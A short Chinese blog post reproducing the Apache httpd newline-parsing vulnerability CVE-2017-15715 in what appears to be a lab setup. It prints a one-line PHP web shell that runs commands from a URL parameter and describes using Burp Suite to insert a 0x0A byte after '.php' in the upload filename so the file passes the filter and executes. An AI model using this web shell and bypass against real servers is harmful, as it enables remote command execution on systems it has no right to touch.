Apache httpd 换行解析漏洞复现(CVE-2017-15715)

Web页面:

新建一个一句话木马:

0.php

复制代码
<?php system($_GET[0]); ?>

上传木马, burpsuite 抓包。

直接上传是回显 bad file。

我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。

send 后,我们访问一下。发现木马上传成功。

相关推荐
像素之间9 小时前
HTTP之content-disposition
网络·网络协议·http
2501_9159090610 小时前
tcpdump 抓包数据分析实战,命令、过滤、常见故障定位与真机补充流程
网络·测试工具·ios·小程序·uni-app·iphone·tcpdump
路由侠内网穿透11 小时前
本地部署开源持续集成和持续部署系统 Woodpecker CI 并实现外部访问
服务器·网络·windows·ci/cd·开源
wfsec12 小时前
EDI许可证:企业数字化转型的“安全基石”与“信任通行证”
安全
光储圈12 小时前
光伏安全协议-安全责任协议书8篇
网络·安全
你的人类朋友12 小时前
什么是断言?
前端·后端·安全
FIN666813 小时前
昂瑞微:实现精准突破,攻坚射频“卡脖子”难题
前端·人工智能·安全·前端框架·信息与通信
im_AMBER13 小时前
杂记 14
前端·笔记·学习·web
时空潮汐13 小时前
神卓 N600:内网穿透需求的高效安全之选
网络·安全·群晖nas·神卓n600
乐迪信息13 小时前
乐迪信息:基于AI算法的煤矿作业人员安全规范智能监测与预警系统
大数据·人工智能·算法·安全·视觉检测·推荐算法